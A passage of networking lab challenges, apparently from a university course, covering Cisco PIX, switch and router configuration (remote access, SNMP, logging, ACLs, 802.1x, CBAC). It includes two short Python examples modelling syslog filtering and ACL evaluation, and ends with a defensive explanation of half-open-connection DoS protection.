myPIX (config)# aaa authentication http console orange
myPIX (config)# aaa authentication serial console orange
myPIX (config)# aaa authentication telnet console orange

Cisco PIX Challenge 28


Outline
This challenge involves the configuration of Telnet, SSH, and HTTP access.
Objectives
The objectives of this challenge are to:

Define Telnet access on interfaces.
Define SSH access on interfaces.
Enable HTTP server.
Define HTTP access on interfaces.
Define timeouts for servers.

Example
myPIX (config)# telnet 204.134.17.7 255.255.192.0 inside
myPIX (config)# telnet 201.13.14.2 255.255.240.0 outside
myPIX (config)# telnet 210.1.170.5 255.255.224.0 inf2
myPIX (config)# telnet timeout 10
myPIX (config)# show telnet
myPIX (config)# show telnet timeout
myPIX (config)# ssh 204.134.17.7 255.255.192.0 inside
myPIX (config)# ssh timeout 10
myPIX (config)# http server enable
myPIX (config)# http 204.134.17.7 255.255.192.0 inside
myPIX (config)# http 201.13.14.2 255.255.240.0 outside

Cisco PIX Challenge 29


Outline
This challenge involves the configuration of SNMP.
Objectives
The objectives of this challenge are to:

Define SNMP community.
Define SNMP location.
Define SNMP host.
Define SNMP contact.
Enable SNMP traps.

Example
> en
myPIX # config t
myPIX (config)# help snmp-server
USAGE:
[no] snmp-server community|contact|location <text>
[no] snmp-server host <if_name> <local_ip> [trap|poll]
[community <text>] [version {1|2c}] [udp-port <port>]
[no] snmp-server enable [traps [all | <feature> [<trap1> ... <trapn>]]]
show snmp-server statistics
show running-config [all] snmp-server
clear configure snmp-server
DESCRIPTION:
snmp-server

Provide SNMP and event information

SYNTAX:
community        Configure the community string.
contact          Text for mib object sysContact.
location         Text for mib object sysLocation.
<text>           The contact person name, location, or community string.
host             Specify hosts to receive SNMP traps and send SNMP polls.
<if_name>        The network interface where the SNMP management station resides.
<local_ip>       The address of the SNMP management station.
[trap|poll]      specify whether the host can poll or receive traps. Default is both.
udp-port         Override the default SNMP trap port. Only valid when host may receive traps.
<port>           The port to which traps will be sent.
version          SNMP version to use for notification message.
[1|2c]           Use SNMPv1 or SNMPv2c.
enable           Enable/Disable snmp-server or particular traps.
traps            Enable/disable particular traps to SNMP management station(s).
all              Enable/disable traps for all features.
<feature>        The feature for which traps are enabled.
<trapn>          A specific trap to enable.
listen-port      Configure the SNMP engine's listening port.
statistics       Show snmp-server statistics.

see also:
logging
myPIX (config)# snmp-server
Not enough arguments.
Usage: [no] snmp-server community|contact|location <text>
[no] snmp-server host [<if_name>] <local_ip> [trap|poll]
[no] snmp-server enable traps
myPIX (config)# snmp-server community oldest ro
myPIX (config)# snmp-server location edinburgh
myPIX (config)# snmp-server host inside 160.61.110.11
myPIX (config)# snmp-server contact june
myPIX (config)# snmp-server enable traps

Cisco PIX Challenge 30


Outline
This challenge involves the configuration of logging.
Objectives
The objectives of this challenge are to:

Enable logging.
Define logging levels.

Example
> en
myPIX # config t
myPIX (config)# help logg
USAGE:
[no] logging enable
[no] logging timestamp
[no] logging standby
[no] logging debug-trace
[no] logging emblem
[no] logging flash-bufferwrap
[no] logging flash-minimum-free <kbytes>
[no] logging flash-maximum-allocation <kbytes>
[no] logging ftp-bufferwrap
[no] logging ftp-server <ftp-server> <path> <username> <password>
[no] logging buffer-size <bytes>
[no] logging permit-hostdown
[no] logging from-address <mail-address>
[no] logging recipient-address <mail-address> [level <level>]
[no] logging host <in_if> <l_ip> [{tcp|6}|{udp|17}[/<port#>]] [format emblem]
[no] logging console <level>|<list>
[no] logging buffered <level>|<list>
[no] logging mail <level>|<list>
[no] logging monitor <level>|<list>
[no] logging history <level>|<list>
[no] logging trap <level>|<list>
[no] logging message <syslog_id> level <level>
[no] logging asdm <level>|<list>
[no] logging asdm-buffer-size <num_of_msgs>
[no] logging facility <fac>
[no] logging device-id {hostname | ipaddress <if_name>
     | string <text> | context-name}
[no] logging queue <queue_size>
[no] logging rate-limit <unlimited | <num> [interval]> message
     <syslog_id> (FWSM only)
[no] logging rate-limit <unlimited | <num> [interval]> level
     <syslog_level> (FWSM only)
[no] logging class <class> <dest1> <level> [<dest2> <level>..]
[no] logging list <list> level <level> [class <class>]
[no] logging list <list> message <syslog_id1>[-<syslog_id2>]
clear logging buffer
clear config logging [disable | level | rate-limit | asdm]
show logging [{message [<syslog_id>|all]} | setting | asdm]
show running-config [all] logging [level | disabled | rate-limit]
DESCRIPTION:
logging          Enable logging facility

SYNTAX:
enable           Enable logging to all supported destinations
timestamp        Enable logging time-stamp on syslog file
standby          Enable logging on standby unit with failover enabled
debug-trace      redirect debug trace output to syslog
ftp-server       Set external ftp server info
<ftp-server>     FTP server name or IP address
<path>           Directory PATH on ftp server for saved log file
<username>       User login on ftp server
<password>       Password for username
buffer-size      Specify the logging buffer size
<bytes>          Logging buffer in bytes. Default/min. is 4096, and
                 max. is 1048576 bytes
permit-hostdown Allow new connection even if TCP syslog server
is down
class
Specify logging event class
<class>
Logging event class name
<destN>
Logging output destination, ie: console, buffer...
list
Specify logging event list
<list>
Logging event list name
host
Send messages to a host
console
Set console logging level
buffered
Copy logging messages to an internal buffer
history
Set SNMP Syslog traps logging level
trap
Set Syslog messages logging level
asdm
Set ASDM logging syslog level
asdm-buffer-size
Set ASDM logging buffer size
message
Disable reporting of this syslog message
device-id
Include the specified device ID in all non-EMBLEM
syslog messages
context-name
Sets the device ID to be the name of the current context
rate-limit
Limit the rate at which syslog is generated
unlimited
Keyword to denote rate limit is disabled
<in_if>
The internal interface name, as specified
by the 'nameif' command
<l_ip>
The IP address of the host receiving the syslog messages
<emblem>
Log messages in Cisco EMBLEM format (available only for UDP)
<fac>
Eight facilities, 16(LOCAL0) - 23(LOCAL7)
The default is 20(LOCAL4), syslog hosts organize messages
based on the facility number. The facility may also be set to
0 - 15, but is only recommended for system use.
<level>
Sets the level above which the device suppresses
messages to the syslog host
0 - System Unusable
1 - Take Immediate Action
2 - Critical Condition
3 - Error Message
4 - Warning Message
5 - Normal but significant condition
6 - Informational
7 - Debug Message
<syslog_id>
The ID of the syslog to suppress reporting
<num>
Number at which the syslog(s) is to be rate limited
<interval>       Time interval (in seconds) over which the syslogs should
                 be limited to 'num'. This parameter is optional and if not
                 specified the default is 1 sec
<syslog_level> The level for which all the syslogs should be rate limited
<queue_size>
The length limit of log queue, 0 - unlimited
<if_name>
interface name
<text>
user-defined device ID
all
This displays all the syslog_ids and their corresponding levels
from-address
Specify from address of mail logging message
recipient-address
Specify recipient address of mail logging message.
A maximum of 5 recipient addresses can be specified
flash-bufferwrap
Save logging buffer to flash when buffer wraps
ftp-bufferwrap
Save logging buffer to external ftp server when
buffer wraps
flash-minimum-free
Minimum free flash space logging must maintain
flash-maximum-allocation
Maximum flash space logging can consume
<kbytes>
Size in Kilo Bytes
myPIX (config)# logging ?
Usage: [no] logging on
[no] logging timestamp
[no] logging standby
[no] logging host [<in_if>] <l_ip> [tcp|udp/port#] [format {emblem}]
[no] logging console <level>
[no] logging buffered <level>
[no] logging monitor <level>
[no] logging history <level>
[no] logging trap <level>
[no] logging message <syslog_id> level <level>
[no] logging facility <fac>
[no] logging device-id hostname | ipaddress <if_name>
| string <text>
logging queue <queue_size>
show logging [{message [<syslog_id>|all]} | level | disabled]
myPIX (config)# logging on
myPIX (config)# logging host 197.38.34.10
myPIX (config)# logging trap informational
myPIX (config)# logging monitor informational
myPIX (config)# loggin console informational
myPIX (config)# logging buffer informational
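
The filtering described in the help text above ("sets the level above which the device suppresses messages to the syslog host", the per-message re-levelling of logging message <syslog_id> level <level>, and the default facility 20/LOCAL4), modelled in Python as an added example that is not part of the challenge or of PIX code. The message ids and texts are constructed; the PRI value follows RFC 3164 (facility * 8 + severity).

```python
import re

# Severity levels as listed in the 'logging' help above (0 = System Unusable .. 7 = Debug).
SEVERITY_NAMES = {
    0: "emergencies", 1: "alerts", 2: "critical", 3: "errors",
    4: "warnings", 5: "notifications", 6: "informational", 7: "debugging",
}
LEVEL_BY_NAME = {name: lvl for lvl, name in SEVERITY_NAMES.items()}
DEFAULT_FACILITY = 20  # LOCAL4, the default quoted in the help text

# PIX syslog header: %PIX-<level>-<six-digit message id>: <text>
PIX_HEADER = re.compile(r"^%PIX-(?P<sev>[0-7])-(?P<id>\d{6}):\s*(?P<text>.*)$")


class TrapPolicy:
    """Model of what 'logging trap', 'logging facility' and
    'logging message <id> level <level>' do to a message before it reaches
    the syslog host (hypothetical helper written for this example, not PIX code)."""

    def __init__(self, trap_level="informational", facility=DEFAULT_FACILITY):
        # Accept the keyword or the numeric level, as the CLI does.
        self.trap_level = LEVEL_BY_NAME.get(trap_level, trap_level)
        if not 16 <= facility <= 23:
            raise ValueError("facility must be 16 (LOCAL0) .. 23 (LOCAL7)")
        self.facility = facility
        self.level_overrides = {}   # syslog_id -> level  ('logging message <id> level <level>')
        self.disabled = set()       # syslog_id           ('no logging message <id>')

    def set_message_level(self, syslog_id, level):
        self.level_overrides[syslog_id] = LEVEL_BY_NAME.get(level, level)

    def disable_message(self, syslog_id):
        self.disabled.add(syslog_id)

    def pri(self, severity):
        # RFC 3164 priority value: facility * 8 + severity.
        return self.facility * 8 + severity

    def forward(self, raw):
        """Return the line as the syslog host receives it, or None when the
        device suppresses it (disabled id, or level above 'logging trap')."""
        m = PIX_HEADER.match(raw)
        if not m:
            raise ValueError(f"not a PIX syslog line: {raw!r}")
        syslog_id = int(m["id"])
        if syslog_id in self.disabled:
            return None
        # A per-message override re-levels the message before the trap filter runs.
        severity = self.level_overrides.get(syslog_id, int(m["sev"]))
        if severity > self.trap_level:
            return None
        return f"<{self.pri(severity)}>%PIX-{severity}-{syslog_id}: {m['text']}"


def filter_batch(policy, lines):
    """Apply the policy to a batch of lines; returns only the forwarded ones."""
    return [out for out in (policy.forward(line) for line in lines) if out is not None]


# Constructed sample messages (ids and text are made up for this example).
SAMPLE_LINES = [
    "%PIX-6-999001: Built outbound TCP connection (constructed)",
    "%PIX-7-999002: Debug trace entry (constructed)",
    "%PIX-3-999003: Error condition (constructed)",
]

if __name__ == "__main__":
    policy = TrapPolicy("informational")                # logging trap informational
    for line in filter_batch(policy, SAMPLE_LINES):
        print(line)
    policy.set_message_level(999002, "notifications")   # logging message 999002 level notifications
    print(filter_batch(policy, SAMPLE_LINES))
```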

Cisco PIX Challenge 41


Outline
PIX Version 7.x only
The new PIX image supports a modular policy framework.
Objectives
The objectives of this challenge are to:

Define class maps. Remember the class map defines the traffic which is interesting.
In this case the class-map relates to defining TCP ports and an access-list.
Apply the class maps.
Define a policy map and apply it to an interface.

Example
myPIX# config t
myPIX(config)# access-list 100 permit tcp host 165.246.68.4 host 200.194.252.5 eq echo
myPIX(config)# class-map ?
myPIX(config)# class-map delaware
myPIX(config-cmap)# ?
myPIX(config-cmap)# description ?
myPIX(config-cmap)# description testing
myPIX(config-cmap)# match ?
myPIX(config-cmap)# match port ?
myPIX(config-cmap)# match port tcp ?
myPIX(config-cmap)# match port tcp eq ?
myPIX(config-cmap)# match port tcp eq 80
myPIX(config-cmap)# match port tcp eq 21
myPIX(config-cmap)# match port tcp eq 23
myPIX(config-cmap)# match port udp eq 23
myPIX(config-cmap)# match access-list ?
myPIX(config-cmap)# match access-list 100
myPIX(config-cmap)# match dscp ?
myPIX(config-cmap)# exit
myPIX(config)# class-map VOICE
myPIX(config-cmap)# exit
myPIX(config)# class-map EXECTEST
myPIX(config-cmap)# exit
myPIX(config)# policy-map ?
myPIX(config)# policy-map NEW
myPIX(config-pmap)# ?
myPIX(config-pmap)# description ?
myPIX(config-pmap)# description test
myPIX(config-pmap)# class ?
myPIX(config-pmap)# class delaware
myPIX(config-pmap-c)# ?
myPIX(config-pmap-c)# inspect ?
myPIX(config-pmap-c)# ips ?
myPIX(config-pmap-c)# police ?
myPIX(config-pmap-c)# police 1000 ?
myPIX(config-pmap-c)# police 1000 500
myPIX(config-pmap-c)# set ?
myPIX(config-pmap-c)# set conn ?
myPIX(config-pmap-c)# exit
myPIX(config-pmap)# exit
myPIX(config)# service-policy ?
myPIX(config)# service-policy NEW ?
myPIX(config)# service-policy NEW interface ?
myPIX(config)# service-policy NEW interface outside

Example
An example, which has not yet been implemented in the challenge, is:
pix1(config)# class-map TEST
pix1(config-cmap)# match port tcp eq 25
pix1(config-cmap)# match tunnel-group S2S
pix1(config-cmap)# exit
pix1(config)# class-map VOICE
pix1(config-cmap)# match dscp ef
pix1(config-cmap)# exit
pix1(config)# class-map EXECTEST
pix1(config-cmap)# match access-list 112
pix1(config-cmap)# exit
pix1(config)# policy-map NEW
pix1(config-pmap)# class TEST

Cisco PIX Challenge 47


Outline
This challenge uses a static mapping with non-default names of the interfaces.
Objectives
The objectives of this challenge are to:

Define E0 details.
Define E1 details.
Define a static mapping (with non-default names).

Example (Ver 7.x)


> enable
myPIX # config t
myPIX (config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# ip address 144.128.32.1 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 1
amsterdam (config-if)# exit
amsterdam (config)# int e1
amsterdam (config-if)# nameif vermont
amsterdam (config-if)# ip address 81.213.27.8 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 12
amsterdam (config-if)# exit
amsterdam (config)# int e2
amsterdam (config-if)# nameif northdakota
amsterdam (config-if)# ip address 145.7.193.1 255.255.0.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 10
amsterdam (config-if)# exit
amsterdam (config)# static (vermont,california) 144.128.32.4 81.213.27.18
amsterdam (config)# static (vermont,california) 144.128.32.5 81.213.27.19
amsterdam (config)# static (vermont,california) 144.128.32.6 81.213.27.20

Cisco PIX Challenge 48


Outline
This challenge applies an ACL to the E0 interface.
Objectives
The objectives of this challenge are to:

Define E0 details.
Define an access-list
Apply the access-list to E0.

Example (Ver 7.x)


> enable
myPIX # config t
myPIX (config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# ip address 144.128.32.1 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 1
amsterdam (config-if)# exit
amsterdam (config)# access-list 101 permit tcp host 132.178.215.10 host 197.161.244.7 eq ftp
amsterdam (config)# access-list 101 deny tcp 120.205.173.0 255.255.0.0 154.213.112.0 255.255.0.0 eq ftp
amsterdam (config)# access-list 101 permit tcp any any
amsterdam (config)# help access-group
USAGE:
[no] access-group <access-list> <in|out> interface <if_name> [per-user-override]
DESCRIPTION:
access-group         Bind an extended access-list to an interface to filter inbound traffic
SYNTAX:
<access-list>        Extended access list number
<in|out>             Inbound or Outbound access list
<if_name>            Name of the interface
per-user-override    Allow AAA downloaded per-user ACL to override
see also:
access-list, object-group
amsterdam (config)# access-group 101 in interface california
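
How the PIX evaluates access-list 101 above against traffic, as an added Python example (not part of the challenge or of PIX code). It reproduces first-match semantics with the implicit deny, PIX subnet masks (not IOS wildcard masks), and the point a reviewer of this ACL should notice: the 255.255.0.0 mask on entry 2 makes the firewall match all of 120.205.0.0/16 to 154.213.0.0/16, not the /24 networks the written addresses suggest. The sample flows are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Service keywords the PIX accepts in place of a port number (subset).
SERVICE_PORTS = {"ftp": 21, "telnet": 23, "smtp": 25, "http": 80, "https": 443}


@dataclass(frozen=True)
class Ace:
    action: str                   # "permit" or "deny"
    proto: str                    # "tcp", "udp" or "ip"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    dport: Optional[int]          # None = any destination port


def _take_address(tokens: List[str]) -> ipaddress.IPv4Network:
    """Consume one PIX address spec: 'any' | 'host A.B.C.D' | 'A.B.C.D M.M.M.M'.
    PIX uses real subnet masks, and host bits set in the written address are
    masked off, so strict=False reproduces what the firewall actually matches."""
    tok = tokens.pop(0)
    if tok == "any":
        return ipaddress.IPv4Network("0.0.0.0/0")
    if tok == "host":
        return ipaddress.IPv4Network(tokens.pop(0) + "/32")
    mask = tokens.pop(0)
    return ipaddress.IPv4Network(f"{tok}/{mask}", strict=False)


def parse_ace(line: str) -> Ace:
    """Parse one 'access-list <id> permit|deny <proto> <src> <dst> [eq <port>]' line."""
    tokens = line.split()
    if tokens[0] != "access-list":
        raise ValueError(f"not an access-list line: {line!r}")
    action, proto = tokens[2], tokens[3]
    rest = tokens[4:]
    src = _take_address(rest)
    dst = _take_address(rest)
    dport = None
    if rest and rest[0] == "eq":
        dport = SERVICE_PORTS.get(rest[1])
        if dport is None:
            dport = int(rest[1])
    return Ace(action, proto, src, dst, dport)


def evaluate(acl: List[Ace], proto: str, src_ip: str, dst_ip: str,
             dport: int) -> Tuple[str, Optional[int]]:
    """First matching entry wins. Returns (action, 1-based entry number);
    ('deny', None) is the implicit deny at the end of every access-list."""
    s, d = ipaddress.IPv4Address(src_ip), ipaddress.IPv4Address(dst_ip)
    for n, ace in enumerate(acl, start=1):
        if ace.proto != "ip" and ace.proto != proto:
            continue
        if s not in ace.src or d not in ace.dst:
            continue
        if ace.dport is not None and ace.dport != dport:
            continue
        return ace.action, n
    return "deny", None


# ACL 101 exactly as entered in the challenge above.
ACL_101 = [parse_ace(line) for line in (
    "access-list 101 permit tcp host 132.178.215.10 host 197.161.244.7 eq ftp",
    "access-list 101 deny tcp 120.205.173.0 255.255.0.0 154.213.112.0 255.255.0.0 eq ftp",
    "access-list 101 permit tcp any any",
)]

if __name__ == "__main__":
    # Entry 2 as the firewall stores it: the /16 mask widens the match well beyond the /24.
    print("entry 2 matches", ACL_101[1].src, "->", ACL_101[1].dst)
    for flow in [("tcp", "132.178.215.10", "197.161.244.7", 21),   # entry 1
                 ("tcp", "120.205.9.1", "154.213.200.4", 21),      # denied by entry 2 via the mask
                 ("tcp", "120.205.173.5", "154.213.112.9", 80),    # not FTP, falls to entry 3
                 ("udp", "10.1.1.1", "10.2.2.2", 53)]:             # no udp entry: implicit deny
        print(flow, "->", evaluate(ACL_101, *flow))
```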

Cisco Switch Challenge 67


Outline
This challenge involves enabling 802.1x authentication.
Objectives
The objectives of this challenge are to:

Define AAA
Enable 802.1x.
Define re-authentication.

Example
> en
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# dot1x ?
default
Configure Dot1x with default values for this port
host-mode
Set the Host mode for 802.1x on this interface
max-req
Max No.of Retries
port-control
set the port-control value
reauthentication Enable or Disable Reauthentication for this port
timeout
Various Timeouts
(config-if)# dot1x port-control ?
auto
PortState will be set to AUTO
force-authorized
PortState set to Authorized
force-unauthorized PortState will be set to UnAuthorized
(config-if)# dot1x port-control auto
(config-if)# dot1 reauthentication ?
<cr>
(config-if)# dot1x re-authentication
(config-if)# dot1 timeout ?
quiet-period
QuietPeriod in Seconds
reauth-period
Time after which an automatic re-authentication should be
initiated
server-timeout Timeout for Radius Retries
supp-timeout
Timeout for Supplicant retries
tx-period
Timeout for Supplicant Re-transmissions
(config-if)# dot1 timeout reauth-period ?
<1-65535> Enter a value between 1 and 65535
(config-if)# dot1x timeout reauth-period 180

Cisco Switch Challenge 68


Outline
This challenge involves enabling 802.1x authentication with authentication from an AAA
server.
Objectives
The objectives of this challenge are to:

Enable AAA.
Define the Radius server.
Enable 802.1x.
Define re-authentication.
Define Dot1x timeouts.

The commands used are:


(config)# aaa new-model
(config)# aaa accounting connection default start-stop group radius
(config)# aaa accounting network default start-stop group radius
(config)# aaa authentication dot1x default group radius local
(config)# dot1x system-auth-control
(config)# radius-server host 10.0.0.1 auth-port 1812 key test
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# dot1x port-control auto
(config-if)# dot1x re-authentication
(config-if)# dot1x timeout reauth-period 180
(config-if)# dot1x timeout tx-period 40
(config-if)# dot1x timeout quiet-period 10
(config-if)# dot1x max-req 3

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authen dot1x ?
WORD
Named authentication list.
default The default authentication list.
(config)# aaa authentication dot1x default ?
enable      Use enable password for authentication.
group       Use Server-group
line        Use line password for authentication.
local       Use local username authentication.
local-case  Use case-sensitive local username authentication.
none        NO authentication.
(config)# aaa authentication dot1x default ?
enable
Use enable password for authentication.
group
Use Server-group
line
Use line password for authentication.
local
Use local username authentication.
local-case Use case-sensitive local username authentication.
none
NO authentication.
(config)# aaa authentication dot1x default group ?
WORD
Server-group name
radius
Use list of all Radius hosts.
tacacs+ Use list of all Tacacs+ hosts.
(config)# aaa authentication dot1x default group radius local
(config)# aaa accounting network ?
WORD
Named Accounting list.
default The default accounting list.
(config)# aaa accounting network default ?
none        No accounting.
start-stop  Record start and stop without waiting
stop-only   Record stop when service terminates.
wait-start  Same as start-stop but wait for start-record commit.

(config)# aaa accounting network d star ?
group Use Server-group
(config)# aaa accounting net d star g ?
WORD
Server-group name
radius
Use list of all Radius hosts.
tacacs+ Use list of all Tacacs+ hosts.
(config)# aaa accounting network default start-stop group radius
(config)# aaa accounting connection ?
WORD
Named Accounting list.
default The default accounting list.
(config)# aaa accounting connection default ?
none        No accounting.
start-stop  Record start and stop without waiting
stop-only   Record stop when service terminates.
wait-start  Same as start-stop but wait for start-record commit.

(config)# aaa accounting connection default start-stop ?
group Use Server-group
(config)# aaa accounting connection default start-stop group ?
WORD
Server-group name
radius
Use list of all Radius hosts.
tacacs+ Use list of all Tacacs+ hosts.
(config)# aaa accounting connection default start-stop group radius ?
group Use Server-group
<cr>
(config)# aaa accounting connection default start-stop group radius
(config)# dot1x ?
system-auth-control Enable or Disable SysAuthControl
(config)# dot1x system-auth-control
(config)# radius-server host ?
Hostname or A.B.C.D IP address of RADIUS server
(config)# radius-server host 10.0.0.1 ?
acct-port
UDP port for RADIUS accounting server (default is 1646)
alias
1-8 aliases for this server (max. 8)
auth-port
UDP port for RADIUS authentication server (default is 1645)
backoff
Retry backoff pattern (Default is retransmits with constant
delay)
key
per-server encryption key (overrides default)
non-standard Parse attributes that violate the RADIUS standard
retransmit
Specify the number of retries to active server (overrides
default)
timeout
Time to wait for this RADIUS server to reply (overrides
default)
<cr>
(config)# radius-server host 10.0.0.1 au ?
<0-65536> Port number
(config)# radius-server host 10.0.0.1 au 1812 ?
acct-port
UDP port for RADIUS accounting server (default is 1813)
auth-port
UDP port for RADIUS authentication server (default is 1812)
key
per-server encryption key (overrides default)
non-standard Parse attributes that violate the RADIUS standard
retransmit
Specify the number of retries to active server (overrides
default)
timeout
Time to wait for this RADIUS server to reply (overrides
default)
<cr>
(config)# radius-server host 10.0.0.1 auth-port 1812 key ?
LINE Text for this server's key
(config)# radius-server host 10.0.0.1 auth-port 1812 key test
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# dot1x ?
default
Configure Dot1x with default values for this port
host-mode
Set the Host mode for 802.1x on this interface
max-req
Max No.of Retries
port-control
set the port-control value
reauthentication Enable or Disable Reauthentication for this port
timeout
Various Timeouts
(config-if)# dot1x port-control auto
(config-if)# dot1x re-authentication
(config-if)# dot1x timeout ?
quiet-period
QuietPeriod in Seconds
reauth-period
Time after which an automatic re-authentication should be
initiated
server-timeout Timeout for Radius Retries
supp-timeout
Timeout for Supplicant retries
tx-period
Timeout for Supplicant Re-transmissions
(config-if)# dot1x timeout reauth-period 180
(config-if)# dot1x timeout tx-period 40
(config-if)# dot1x timeout quiet-period 10
(config-if)# dot1 max-req ?
<1-10> Enter a value between 1 and 10
(config-if)# dot1x max-req 3

Cisco Router Challenge 197


Outline
This challenge involves enabling an authentication proxy using Tacacs+.
Objectives
The objectives of this challenge are to:

Enable AAA.
Define the Tacacs+ server.
Define authentication proxy settings for the HTTP server.

The commands used are:


> en
# config t
(config)# aaa new-model
(config)# aaa authentication login default group tacacs+
(config)# aaa authorization auth-proxy default group tacacs+
(config)# tacacs-server host 1.2.3.4
(config)# ip http server
(config)# ip http authentication tacacs
(config)# ip auth-proxy name AR http
(config)# int e0
(config-if)# ip auth-proxy AR

Example
> en
# config t
(config)# aaa new-model
(config)# aaa authentication login default group tacacs+
(config)# aaa authorization ?
auth-proxy
For Authentication Proxy Services
cache
For AAA cache configuration
commands
For exec (shell) commands.
config-commands For configuration mode commands.
configuration
For downloading configurations from AAA server
exec
For starting an exec (shell).
ipmobile
For Mobile IP services.
network
For network services. (PPP, SLIP, ARAP)
reverse-access
For reverse access connections
template
Enable template authorization
(config)# aaa authorization auth-proxy ?
default The default authorization list.
(config)# aaa authorization auth-proxy default ?
group Use server-group.
local Use local database.
(config)# aaa authorization auth-proxy default group ?
WORD
Server-group name
radius
Use list of all Radius hosts.
tacacs+ Use list of all Tacacs+ hosts.
(config)# aaa authorization auth-proxy default group tacacs+
(config)# tacacs-server host 1.2.3.4
(config)# ip http server
(config)# ip http ?
access-class
Restrict http server access by access-class
authentication
Set http server authentication method
client
Set http client parameters
max-connections
Set maximum number of concurrent http server connections
path
Set base path for HTML
port
Set http server port
secure-ciphersuite Set http secure server ciphersuite
secure-client-auth Set http secure server with client authentication
secure-port
Set http secure server port number for listening
secure-server
Enable HTTP secure server
secure-trustpoint
Set http secure server certificate trustpoint
server
Enable http server
timeout-policy
Set http server time-out policy parameters
(config)# ip http authentication ?
enable Use enable passwords
local
Use local username and passwords
tacacs Use tacacs to authorize user
(config)# ip http authentication tacacs
(config)# ip auth-proxy ?
absolute-timer
Absolute Timeout in min
auth-cache-time
Alias of inactivity-timer
auth-proxy-audit
Authentication Proxy Auditing
auth-proxy-banner
Authentication Proxy Banner
inactivity-timer
Inactivity Timeout in min
max-login-attempts Max Login attempts per user
name
Specify an Authentication Proxy Rule
watch-list
Watch-list
<cr>
(config)# ip auth-proxy name ?
WORD Name of Authentication Rule
(config)# ip auth-proxy name AR ?
ftp     FTP Protocol
http    HTTP Protocol
telnet  Telnet Protocol
<cr>
(config)# ip auth-proxy name AR

(config)# int e0
(config-if)# ip auth-proxy ?
WORD Name of authenticaion proxy rule
(config-if)# ip auth-proxy AR ?
<cr>
(config-if)# ip auth-proxy AR

Cisco Router Challenge 44


Outline
This challenge involves the configuration of IP Inspect.
Objectives
The objectives of this challenge are to:

Setup limits for the number of connections over one-minute.
Setup limits for the number of open connections.
Define SYN waits.

Example
> en
# config t
(config)# ip inspect ?
alert-off
Disable alert
audit-trail
Enable the logging of session information (addresses and
bytes)
dns-timeout
Specify timeout for DNS
max-incomplete Specify maximum number of incomplete connections before
clamping
name
Specify an inspection rule
one-minute
Specify one-minute-sample watermarks for clamping
tcp
Config timeout values for tcp connections
udp
Config timeout values for udp flows
<cr>
(config)# ip inspect one-minute ?
high Specify high-watermark for clamping
low
Specify low-watermark for clamping
(config)# ip inspect one-minute low 360
(config)# ip inspect one-minute high 410
(config)# ip inspect max-incomplete low 720
(config)# ip inspect max-incomplete high 770
(config)# ip inspect dns-timeout 1
(config)# ip inspect tcp ?
finwait-time
Specify timeout for TCP connections after a FIN
idle-time
Specify idle timeout for tcp connections
max-incomplete Specify max half-open connection per host
synwait-time
Specify timeout for TCP connections after a SYN and no
further data
(config)# ip inspect tcp synwait-time ?
<1-2147483> Timeout in seconds
(config)# ip inspect tcp synwait-time 35
(config)# ip inspect tcp finwait-time 5
(config)# ip inspect tcp max-incomplete ?
host Specify max half-open connection per host
(config)# ip inspect tcp max-incomplete host 800
(config)# ip inspect tcp ?
finwait-time
Specify timeout for TCP connections after a FIN
idle-time
Specify idle timeout for tcp connections
max-incomplete Specify max half-open connection per host
synwait-time
Specify timeout for TCP connections after a SYN and no
further data
(config)# ip inspect tcp idle-time 70
(config)# ip inspect udp idle-time 57

Cisco Router Challenge 45


Outline
This challenge involves the configuration of a context based access-list (CBAC).
Objectives
The objectives of this challenge are to:

Setup a CBAC.
Define the protocols which the CBAC applies to.

Example
> en
# config t
(config)# access-list 105 permit ip any any
(config)# int fa0/0
(config-if)# ip access-group 105 in
(config-if)# exit
(config)# ip inspect name cisco ?
cuseeme
CUSeeMe Protocol
fragment
IP fragment inspection
ftp
File Transfer Protocol
h323
H.323 Protocol (e.g, MS NetMeeting, Intel Video Phone)
http
HTTP Protocol
netshow
Microsoft NetShow Protocol
rcmd
R commands (r-exec, r-login, r-sh)
realaudio
Real Audio Protocol
rpc
Remote Prodedure Call Protocol
rtsp
Real Time Streaming Protocol
smtp
Simple Mail Transfer Protocol
sqlnet
SQL Net Protocol
streamworks StreamWorks Protocol
tcp
Transmission Control Protocol
tftp
TFTP Protocol
udp
User Datagram Protocol
vdolive
VDOLive Protocol
(config)# ip inspect name cisco tcp
(config)# ip inspect name cisco udp
(config)# ip inspect name cisco ftp
(config)# ip inspect name cisco sqlnet
(config)# int e0
(config-if)#ip inspect ?
WORD Name of inspection defined
(config-if)#ip inspect cisco
(config-if)#ip inspect cisco in
(config-if)# exit
(config)# access-list 106 deny ip any any
(config)# int s0
(config-if)# ip access-group 106 in

Explanation
ACLs are fairly static in their operation, and they do not take into account the context of a
data packet. Thus they cannot detect the actual state of a connection. A typical type of attack
on a system is DoS (Denial-of-Service), which is caused when multiple remote clients access
the same server. Knowing the context of a data packet, or its associated connection,
thus allows finer control of the security of the system. For example, in a DoS the firewall
could detect that the number of connections in a given time limit had exceeded a given
number, and block any other ones within a given time. Context-based Access Control
(CBAC) is thus stateful and dynamic, and can look further into packets than normal
ACLs. In client-server communications the key states in most connections are:

Client sends a SYN flag to the server.
The server responds with a SYN, ACK to the client.
The client responds with an ACK, and the connection is made.
The client and server then communicate.
The client sends a FIN, ACK flag.
The server sends an ACK flag, and the connection is finished.

Context-based Access Control is used to implement firewall options, such as limiting the
number of open connections. A typical attack is the DoS (Denial of Service) attack, where
the external party opens up multiple connections. To overcome this, the router can be set up
to detect a threshold for half-open sessions. A half-open session is where either
the client or server quits the session without the other side knowing about it. In a DoS, the
client opens a connection, and does not complete it. The server does not know that the client
has disconnected, thus the connection still takes some resources on the server, which can
become overburdened if there are many open sessions. On the Napier pods, use Pod C
